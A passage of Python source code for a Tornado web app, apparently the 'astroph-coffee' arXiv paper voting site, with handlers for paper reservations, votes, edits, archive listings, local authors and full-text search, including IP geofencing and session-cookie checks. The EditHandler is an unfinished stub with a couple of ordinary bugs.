user_name=user_name,
local_today=local_today,
todays_date=todays_date,
local_articles=local_articles,
voted_articles=voted_articles,
other_articles=other_articles,
reserved_articles=reserved_articles,
reserve_interval_days=self.reserve_interval,
flash_message=flash_message,
new_user=new_user)
class ReservationHandler(tornado.web.RequestHandler):
'''
This handles all requests for the voting page.
'''
def initialize(self,
database,
voting_start,
voting_end,
debug,
signer,
geofence,
countries,
regions):
'''
Sets up the database.
'''
self.database = database
self.voting_start = voting_start
self.voting_end = voting_end
self.debug = debug
self.signer = signer
self.geofence = geofence[0]
self.ipaddrs = geofence[1]
self.editips = geofence[2]
self.countries = countries
self.regions = regions
def post(self):
'''
This handles a POST request for a paper reservation.
'''
arxivid = self.get_argument('arxivid', None)
reservetype = self.get_argument('reservetype', None)
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
sessioninfo = webdb.session_check(session_token,
database=self.database)
user_name = sessioninfo[2]
todays_utcdate = datetime.now(tz=utc).strftime('%Y-%m-%d')
user_ip = self.request.remote_ip
# if we're asked to geofence, then do so
# (unless the request came from INSIDE the building)
# FIXME: add exceptions for private network IPv4 addresses
geolocked = False
# check the network as well
try:
userip_addrobj = ipaddress.ip_address(user_ip.decode())
trustedip = any([(userip_addrobj in x) for x in self.ipaddrs])
except:
trustedip = False
if self.geofence and user_ip != '127.0.0.1':
try:
geoip = self.geofence.city(user_ip)
if (geoip.country.iso_code in self.countries and
geoip.subdivisions.most_specific.iso_code
in self.regions):
LOGGER.info('geofencing ok: '
'reservation request '
'from inside allowed regions')
else:
LOGGER.warning(
'geofencing activated: '
'vote request from %s '
'is outside allowed regions' %
('%s-%s' % (
geoip.country.iso_code,
geoip.subdivisions.most_specific.iso_code
))
)
message = ("Sorry, you're trying to vote "
"from an IP address that is "
"blocked from voting.")
jsondict = {'status':'failed',
'message':message,
'results':None}
geolocked = True
self.write(jsondict)
self.finish()
# fail deadly
except Exception as e:
LOGGER.exception('geofencing failed for IP %s, '
'blocking request.' % user_ip)
message = ("Sorry, you're trying to vote "
"from an IP address that is "
"blocked from voting.")
jsondict = {'status':'failed',
'message':message,
'results':None}
geolocked = True
self.write(jsondict)
self.finish()
#############################
## PROCESS THE RESERVATION ##
#############################
# check if we're in voting time-limits
timenow = datetime.now(tz=utc).timetz()
# if we are within the time limits, then allow the voting POST request
if (self.voting_start < timenow < self.voting_end):
in_votetime = True
else:
in_votetime = False
# if all things are satisfied, then process the reserve request
if (arxivid and
reservetype and
sessioninfo[0] and
((not geolocked) or trustedip) and
in_votetime):
arxivid = xhtml_escape(arxivid)
reservetype = xhtml_escape(reservetype)
LOGGER.info('user: %s, reserving: %s, on: %s' % (user_name,
reservetype,
arxivid))
if 'arXiv:' not in arxivid or reservetype not in ('reserve',
'release'):
message = ("Your paper reservation request "
"used invalid arguments "
"and has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
else:
# first, check how many reservations this user has
user_reservations = arxivdb.get_user_reservations(
todays_utcdate,
user_name,
database=self.database
)
# make sure it's less than 5 or we're not adding another
# reservation
if len(user_reservations) < 5 or reservetype != 'reserve':
reserve_outcome = arxivdb.record_reservation(
arxivid,
user_name,
reservetype,
database=self.database
)
if reserve_outcome is False or None:
message = ("That article doesn't exist, "
"and your reservation "
"has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
else:
if (reserve_outcome[0] == 1 and
reserve_outcome[1] == user_name):
message = ("Reservation successfully recorded for %s"
% arxivid)
jsondict = {'status':'success',
'message':message,
'results':{'reserved':reserve_outcome[0]}}
elif (reserve_outcome[0] == 1 and
reserve_outcome[1] != user_name):
message = ("Someeone else already reserved that paper!")
jsondict = {'status':'failed',
'message':message,
'results':{'reserved':reserve_outcome[0]}}
elif (reserve_outcome[0] == 0):
message = ("Release successfully recorded for %s"
% arxivid)
jsondict = {'status':'success',
'message':message,
'results':{'reserved':reserve_outcome[0]}}
else:
message = ("That article doesn't exist, "
"or your reservation "
"has been discarded because of a problem.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
else:
message = ("You've reserved 5 articles already.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
elif ((not geolocked) or trustedip):
message = ("Your reservation request could not be authorized"
" and has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
else:
message = ("Your reservation request could not be authorized"
" and has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
class VotingHandler(tornado.web.RequestHandler):
'''
This handles all requests for the voting page.
'''
def initialize(self,
database,
voting_start,
voting_end,
debug,
signer,
geofence,
countries,
regions):
'''
Sets up the database.
'''
self.database = database
self.voting_start = voting_start
self.voting_end = voting_end
self.debug = debug
self.signer = signer
self.geofence = geofence[0]
self.ipaddrs = geofence[1]
self.editips = geofence[2]
self.countries = countries
self.regions = regions
def post(self):
'''This handles POST requests for vote submissions.
takes the following arguments:
arxivid: article to vote for
votetype: up / down
checks if an existing session is in play. if not, flashes a message
saying 'no dice' in a flash message
- checks if the user has more than five votes used for the utcdate of
the requested arxivid
- if they do, then deny vote
- if they don't, allow vote
if vote is allowed:
- changes the nvote column for arxivid
- adds the current user to the voters column
- returns the nvotes for the arxivid along with
success/failure
if vote is not allowed:
- sends back a 401 + error message, which the frontend JS turns into a
flash message
the frontend JS then:
- updates the vote total for this arxivid
- handles flash messages
- updates the vote button status
'''
arxivid = self.get_argument('arxivid', None)
votetype = self.get_argument('votetype', None)
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
sessioninfo = webdb.session_check(session_token,
database=self.database)
user_name = sessioninfo[2]
todays_utcdate = datetime.now(tz=utc).strftime('%Y-%m-%d')
user_ip = self.request.remote_ip
# TESTING
# user_ip = '131.111.184.18' # Cambridge UK
# user_ip = '71.168.183.215' # FIOS NJ
# user_ip = '70.192.88.245' # VZW NJ
# user_ip = '70.42.157.5' # VZW NY
# user_ip = '69.141.255.240' # Comcast PA
# user_ip = '128.112.25.36' # Princeton Univ, NJ
# if we're asked to geofence, then do so
# (unless the request came from INSIDE the building)
# FIXME: add exceptions for private network IPv4 addresses
geolocked = False
# check the network as well
try:
userip_addrobj = ipaddress.ip_address(user_ip.decode())
trustedip = any([(userip_addrobj in x) for x in self.ipaddrs])
except:
trustedip = False
if self.geofence and user_ip != '127.0.0.1':
try:
# check the geoip location
geoip = self.geofence.city(user_ip)
if (geoip.country.iso_code in self.countries and
geoip.subdivisions.most_specific.iso_code
in self.regions):
LOGGER.info('geofencing ok: '
'vote request from inside allowed regions')
else:
LOGGER.warning(
'geofencing activated: '
'vote request from %s '
'is outside allowed regions' %
('%s-%s' % (
geoip.country.iso_code,
geoip.subdivisions.most_specific.iso_code
))
)
message = ("Sorry, you're trying to vote "
"from an IP address that is "
"blocked from voting.")
jsondict = {'status':'failed',
'message':message,
'results':None}
geolocked = True
self.write(jsondict)
self.finish()
# fail deadly
except Exception as e:
LOGGER.exception('geofencing failed for IP %s, '
'blocking request.' % user_ip)
message = ("Sorry, you're trying to vote "
"from an IP address that is "
"blocked from voting.")
jsondict = {'status':'failed',
'message':message,
'results':None}
geolocked = True
self.write(jsondict)
self.finish()
# check if we're in voting time-limits
timenow = datetime.now(tz=utc).timetz()
# if we are within the time limits, then allow the voting POST request
if (self.voting_start < timenow < self.voting_end):
in_votetime = True
else:
in_votetime = False
# if all things are satisfied, then process the vote request
if (arxivid and
votetype and
sessioninfo[0] and
(not geolocked or trustedip) and
in_votetime):
arxivid = xhtml_escape(arxivid)
votetype = xhtml_escape(votetype)
LOGGER.info('user: %s, voting: %s, on: %s' % (user_name,
votetype,
arxivid))
if 'arXiv:' not in arxivid or votetype not in ('up','down'):
message = ("Your vote request used invalid arguments"
" and has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
else:
# first, check how many votes this user has
user_votes = arxivdb.get_user_votes(todays_utcdate,
user_name,
database=self.database)
# make sure it's less than 5 or the votetype isn't up
if len(user_votes) < 5 or votetype != 'up':
vote_outcome = arxivdb.record_vote(arxivid,
user_name,
votetype,
database=self.database)
if vote_outcome is False:
message = ("That article doesn't exist, and your vote "
"has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
else:
message = ("Vote successfully recorded for %s" % arxivid)
jsondict = {'status':'success',
'message':message,
'results':{'nvotes':vote_outcome}}
self.write(jsondict)
self.finish()
else:
message = ("You've voted on 5 articles already.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
elif (not geolocked or trustedip):
message = ("Your vote request could not be authorized"
" and has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
else:
message = ("Your reservation request could not be authorized"
" and has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
class EditHandler(tornado.web.RequestHandler):
'''This handles all requests for the editing function.
This allows users in the trustedip range to edit the arxiv listing for the
current day.
The allowable edits are:
- paper is local author
- paper is not local author
'''
def initialize(self,
database,
voting_start,
voting_end,
debug,
signer,
geofence,
countries,
regions):
'''
Sets up the database.
'''
self.database = database
self.voting_start = voting_start
self.voting_end = voting_end
self.debug = debug
self.signer = signer
self.geofence = geofence[0]
self.ipaddrs = geofence[1]
self.editips = geofence[2]
self.countries = countries
self.regions = regions
def post(self):
'''
This handles a POST request for a paper reservation.
'''
arxivid = self.get_argument('arxivid', None)
edittype = self.get_argument('edittype', None)
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
sessioninfo = webdb.session_check(session_token,
database=self.database)
user_name = sessioninfo[2]
todays_utcdate = datetime.now(tz=utc).strftime('%Y-%m-%d')
user_ip = self.request.remote_ip
# check the network
try:
userip_addrobj = ipaddress.ip_address(user_ip.decode())
trustedip = any([(userip_addrobj in x) for x in self.editips])
except:
trustedip = False
######################
## PROCESS THE EDIT ##
######################
# check if we're in voting time-limits
timenow = datetime.now(tz=utc).timetz()
# if we are within the time limits, then allow the voting POST request
if (self.voting_start < timenow < self.voting_end):
in_votetime = True
else:
in_votetime = False
# editing only checks its cidr and if we're in vote mode
if (arxivid and edittype and sessioninfo[0] and
trustedip and in_votetime):
arxivid = xhtml_escape(arxivid)
edittype = xhtml_escape(edittype)
LOGGER.info('user: %s, reserving: %s, on: %s' % (user_name,
reservetype,
arxivid))
if 'arXiv:' not in arxivid or editttype not in ('local',
'notlocal'):
message = ("Your paper reservation request "
"used invalid arguments "
"and has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
else:
# process the edit
pass
# if we're not allowed to edit, discard the request
else:
message = ("Your edit request could not be authorized "
"(probably because the voting window is over)"
"and has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
class AboutHandler(tornado.web.RequestHandler):
'''
This handles all requests for /astroph-coffee/about.
'''
def initialize(self, database):
'''
This sets up the database.
'''
self.database = database
def get(self):
'''
This handles GET requests.
'''
# handle a redirect with an attached flash message
flash_message = self.get_argument('f', None)
if flash_message:
flashtext = msgdecode(flash_message)
LOGGER.warning('flash message: %s' % flashtext)
flashbox = (
'<div data-alert class="alert-box radius">%s'
'<a href="#" class="close">×</a></div>' %
flashtext
)
flash_message = flashbox
else:
flash_message = ''
local_today = datetime.now(tz=utc).strftime('%Y-%m-%d %H:%M %Z')
# first, get the session token
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
ip_address = self.request.remote_ip
if 'User-Agent' in self.request.headers:
client_header = self.request.headers['User-Agent'] or 'none'
else:
client_header = 'none'
user_name = 'anonuser@%s' % ip_address
new_user = True
# check if this session_token corresponds to an existing user
if session_token:
sessioninfo = webdb.session_check(session_token,
database=self.database)
if sessioninfo[0]:
user_name = sessioninfo[2]
LOGGER.info('found session for %s, continuing with it' %
user_name)
new_user = False
elif sessioninfo[-1] != 'database_error':
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
else:
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
error_message=message,
local_today=local_today,
flash_message=flash_message,
new_user=new_user)
else:
if ('crawler' not in client_header.lower() and
'bot' not in client_header.lower()):
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
#########################
# show the contact page #
#########################
self.render("about.html",
local_today=local_today,
user_name=user_name,
flash_message=flash_message,
new_user=new_user)
class ArchiveHandler(tornado.web.RequestHandler):
'''
This handles all paper archive requests.
url: /astroph-coffee/archive/YYYYMMDD
'''
def initialize(self,
database,
reserve_interval,
signer):
'''
Sets up the database.
'''
self.database = database
self.reserve_interval = reserve_interval
self.signer = signer
def get(self, archivedate):
'''
This handles GET requests.
'''
# handle a redirect with an attached flash message
flash_message = self.get_argument('f', None)
if flash_message:
flashtext = msgdecode(flash_message, self.signer)
LOGGER.warning('flash message: %s' % flashtext)
flashbox = (
'<div data-alert class="alert-box radius">%s'
'<a href="#" class="close">×</a></div>' %
flashtext
)
flash_message = flashbox
else:
flash_message = ''
local_today = datetime.now(tz=utc).strftime('%Y-%m-%d %H:%M %Z')
# first, get the session token
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
ip_address = self.request.remote_ip
if 'User-Agent' in self.request.headers:
client_header = self.request.headers['User-Agent'] or 'none'
else:
client_header = 'none'
user_name = 'anonuser@%s' % ip_address
new_user = True
# check if this session_token corresponds to an existing user
if session_token:
sessioninfo = webdb.session_check(session_token,
database=self.database)
if sessioninfo[0]:
user_name = sessioninfo[2]
LOGGER.info('found session for %s, continuing with it' %
user_name)
new_user = False
elif sessioninfo[-1] != 'database_error':
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
else:
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
error_message=message,
local_today=local_today,
flash_message=flash_message,
new_user=new_user)
else:
if ('crawler' not in client_header.lower() and
'bot' not in client_header.lower()):
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
##################################
# now handle the archive request #
##################################
if archivedate is not None:
archivedate = xhtml_escape(archivedate)
archivedate = re.match(ARCHIVEDATE_REGEX, archivedate)
if archivedate:
year, month, day = archivedate.groups()
listingdate = '%s-%s-%s' % (year, month, day)
# get the articles for today
(latestdate, local_articles,
voted_articles, other_articles, reserved_articles) = (
arxivdb.get_articles_for_listing(utcdate=listingdate,
database=self.database)
)
# if this date's papers aren't available, show the archive index
if (not local_articles and
not voted_articles and
not other_articles and
not reserved_articles):
flash_message = (
"<div data-alert class=\"alert-box radius\">"
"No papers for %s were found. "
"You've been redirected to the Astro-Coffee archive."
"<a href=\"#\" class=\"close\">×</a></div>"
) % listingdate
(archive_dates, archive_npapers,
archive_nlocal, archive_nvoted) = arxivdb.get_archive_index(
database=self.database
)
paper_archives = group_arxiv_dates(archive_dates,
archive_npapers,
archive_nlocal,
archive_nvoted)
self.render("archive.html",
user_name=user_name,
flash_message=flash_message,
new_user=new_user,
paper_archives=paper_archives,
local_today=local_today)
else:
# figure out the UTC date for this archive listing
archive_datestr = datetime(
hour=0,
minute=15,
second=0,
day=int(day),
month=int(month),
year=int(year),
tzinfo=utc
).strftime('%A, %b %d %Y')
# preprocess the local papers to highlight local author names
if len(local_articles) > 0:
for lind in range(len(local_articles)):
author_list = local_articles[lind][4]
author_list = author_list.split(': ')[-1].split(',')
local_indices = local_articles[lind][-2]
if local_indices and len(local_indices) > 0:
local_indices = [
int(x) for x in local_indices.split(',')
]
for li in local_indices:
author_list[li] = '<strong>%s</strong>' % (
author_list[li]
)
# update this article's local authors
local_articles[lind][4] = ', '.join(author_list)
# show the listing page
self.render("archivelisting.html",
user_name=user_name,
local_today=local_today,
todays_date=archive_datestr,
local_articles=local_articles,
voted_articles=voted_articles,
other_articles=other_articles,
reserved_articles=reserved_articles,
reserve_interval_days=self.reserve_interval,
flash_message=flash_message,
new_user=new_user)
else:
(archive_dates, archive_npapers,
archive_nlocal, archive_nvoted) = arxivdb.get_archive_index(
database=self.database
)
paper_archives = group_arxiv_dates(archive_dates,
archive_npapers,
archive_nlocal,
archive_nvoted)
self.render("archive.html",
user_name=user_name,
flash_message=flash_message,
new_user=new_user,
paper_archives=paper_archives,
local_today=local_today)
else:
(archive_dates, archive_npapers,
archive_nlocal, archive_nvoted) = arxivdb.get_archive_index(
database=self.database
)
paper_archives = group_arxiv_dates(archive_dates,
archive_npapers,
archive_nlocal,
archive_nvoted)
self.render("archive.html",
user_name=user_name,
flash_message=flash_message,
new_user=new_user,
paper_archives=paper_archives,
local_today=local_today)
class LocalListHandler(tornado.web.RequestHandler):
'''
This handles all requests for /astroph-coffee/local-authors.
'''
def initialize(self, database, admincontact, adminemail):
'''
This sets up the database.
'''
self.database = database
self.admincontact = admincontact
self.adminemail = adminemail
def get(self):
'''
This handles GET requests.
'''
# handle a redirect with an attached flash message
flash_message = self.get_argument('f', None)
if flash_message:
flashtext = msgdecode(flash_message)
LOGGER.warning('flash message: %s' % flashtext)
flashbox = (
'<div data-alert class="alert-box radius">%s'
'<a href="#" class="close">×</a></div>' %
flashtext
)
flash_message = flashbox
else:
flash_message = ''
local_today = datetime.now(tz=utc).strftime('%Y-%m-%d %H:%M %Z')
# first, get the session token
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
ip_address = self.request.remote_ip
if 'User-Agent' in self.request.headers:
client_header = self.request.headers['User-Agent'] or 'none'
else:
client_header = 'none'
user_name = 'anonuser@%s' % ip_address
new_user = True
# check if this session_token corresponds to an existing user
if session_token:
sessioninfo = webdb.session_check(session_token,
database=self.database)
if sessioninfo[0]:
user_name = sessioninfo[2]
LOGGER.info('found session for %s, continuing with it' %
user_name)
new_user = False
elif sessioninfo[-1] != 'database_error':
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
else:
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
error_message=message,
local_today=local_today,
flash_message=flash_message,
new_user=new_user)
else:
if ('crawler' not in client_header.lower() and
'bot' not in client_header.lower()):
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
###############################
# show the local authors page #
###############################
authorlist = webdb.get_local_authors(database=self.database)
if authorlist:
self.render("local-authors.html",
local_today=local_today,
user_name=user_name,
flash_message=flash_message,
new_user=new_user,
authorlist=authorlist,
admincontact=self.admincontact,
adminemail=self.adminemail)
else:
LOGGER.error('could not get the author list!')
message = ("There was a database error "
"trying to look up local authors. "
"Please "
"<a href=\"/astroph-coffee/about\">"
"let us know</a> about this problem!")
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
class FTSHandler(tornado.web.RequestHandler):
'''
This handles all requests for searching.
GET returns a search page.
POST posts the AJAX request.
'''
def initialize(self,
database,
voting_start,
voting_end,
debug,
signer,
geofence,
countries,
regions):
'''
Sets up the database.
'''
self.database = database
self.voting_start = voting_start
self.voting_end = voting_end
self.debug = debug
self.signer = signer
self.geofence = geofence[0]
self.ipaddrs = geofence[1]
self.editips = geofence[2]
self.countries = countries
self.regions = regions
def get(self):
'''This handles GET requests for searching.
'''
# handle a redirect with an attached flash message
flash_message = self.get_argument('f', None)
if flash_message:
flashtext = msgdecode(flash_message)
LOGGER.warning('flash message: %s' % flashtext)
flashbox = (
'<div data-alert class="alert-box radius">%s'
'<a href="#" class="close">×</a></div>' %
flashtext
)
flash_message = flashbox
else:
flash_message = ''
local_today = datetime.now(tz=utc).strftime('%Y-%m-%d %H:%M %Z')
# first, get the session token
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
ip_address = self.request.remote_ip
if 'User-Agent' in self.request.headers:
client_header = self.request.headers['User-Agent'] or 'none'
else:
client_header = 'none'
user_name = 'anonuser@%s' % ip_address
new_user = True
# check if this session_token corresponds to an existing user
if session_token:
sessioninfo = webdb.session_check(session_token,
database=self.database)
if sessioninfo[0]:
user_name = sessioninfo[2]
LOGGER.info('found session for %s, continuing with it' %
user_name)
new_user = False
elif sessioninfo[-1] != 'database_error':
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
else:
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
error_message=message,
local_today=local_today,
flash_message=flash_message,
new_user=new_user)
else:
if ('crawler' not in client_header.lower() and
'bot' not in client_header.lower()):
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
#######################
## CONTENT RENDERING ##
#######################
self.render("search.html",
user_name=user_name,
local_today=local_today,
flash_message=flash_message,
search_page_title="Search the Astro-Coffee archive",
search_page_type="initial",
search_results=None,
search_result_info='',
search_nmatches=0,
new_user=new_user)
def post(self):
'''This handles POST requests for searching.
renders using the search.html template with search_page_type = 'results'
and passes search_results to it from a run of the
fulltextsearch.fts4_phrase_search_paginated function.
'''
# handle a redirect with an attached flash message
flash_message = self.get_argument('f', None)
if flash_message:
flashtext = msgdecode(flash_message)
LOGGER.warning('flash message: %s' % flashtext)
flashbox = (
'<div data-alert class="alert-box radius">%s'
'<a href="#" class="close">×</a></div>' %
flashtext
)
flash_message = flashbox
else:
flash_message = ''
local_today = datetime.now(tz=utc).strftime('%Y-%m-%d %H:%M %Z')
# first, get the session token
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
ip_address = self.request.remote_ip
if 'User-Agent' in self.request.headers:
client_header = self.request.headers['User-Agent'] or 'none'
else:
client_header = 'none'
user_name = 'anonuser@%s' % ip_address
new_user = True
# check if this session_token corresponds to an existing user
if session_token:
sessioninfo = webdb.session_check(session_token,
database=self.database)
if sessioninfo[0]:
user_name = sessioninfo[2]
LOGGER.info('found session for %s, continuing with it' %
user_name)
new_user = False
elif sessioninfo[-1] != 'database_error':
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
else:
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
error_message=message,
local_today=local_today,
flash_message=flash_message,
new_user=new_user)
else:
if ('crawler' not in client_header.lower() and
'bot' not in client_header.lower()):
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
#######################
## CONTENT RENDERING ##
#######################
# get the search query
searchquery = self.get_argument('searchquery',None)
if not searchquery or len(searchquery) == 0:
search_result_info = ('Sorry, we couldn\'t understand your '
'search query: <strong>%s</strong>' %
squeeze(xhtml_escape(searchquery)))
search_results = None
search_nmatches = 0
self.render("search.html",
user_name=user_name,
local_today=local_today,
flash_message=flash_message,
search_page_title="Search the Astro-Coffee archive",
search_page_type="results",
search_results=search_results,
search_nmatches=search_nmatches,
search_result_info=search_result_info,
new_user=new_user)
else:
searchquery = squeeze(xhtml_escape(searchquery))
if len(searchquery) > 0:
try:
# figure out the weights to apply
titleq_count = searchquery.count('title:')
abstractq_count = searchquery.count('abstract:')
authorq_count = searchquery.count('authors:')
author_weight = 1.0 + 1.0*authorq_count
abstract_weight = 3.0 + 1.0*abstractq_count
title_weight = 2.0 + 1.0*titleq_count
# turn any " characters into " so we can do exact
# phrase matching
searchquery = searchquery.replace('"','"')
ftsdict = fts.fts4_phrase_query_paginated(
searchquery,
['arxiv_id','day_serial','title',
'authors','comments','abstract',
'link','pdf','utcdate',
'nvotes',
'local_authors', 'local_author_indices'],
sortcol='relevance',
pagelimit=500,
database=self.database,
relevance_weights=[title_weight,
abstract_weight,
author_weight],
)
search_results = ftsdict['results']
all_nmatches = ftsdict['nmatches']
LOGGER.info('found %s objects matching %s' % (all_nmatches,
searchquery))
relevance_sticker = (
'<span data-tooltip aria-haspopup="true" '
'class="has-tip" title="Okapi BM25 relevance '
'weights: title = %.1f, '
'abstract = %.1f,'
' authors = %.1f, all others = 1.0">relevant</span>'
) % (title_weight, abstract_weight, author_weight)
if all_nmatches == 0:
search_nmatches = 0
search_result_info = (
'Sorry, <span class="nmatches">0</span> '
'matching items were found for: '
'<strong>%s</strong>' %
searchquery
)
elif all_nmatches == 1:
search_nmatches = 1
search_result_info = (
'Found only <span class="nmatches">1</span> '
'matching item for: '
'<strong>%s</strong>' % searchquery
)
elif 1 < all_nmatches < 501:
search_nmatches = len(ftsdict['results']['arxiv_id'])
search_result_info = (
'Found <span class="nmatches">%s</span> '
'matching items for: '
'<strong>%s</strong>' %
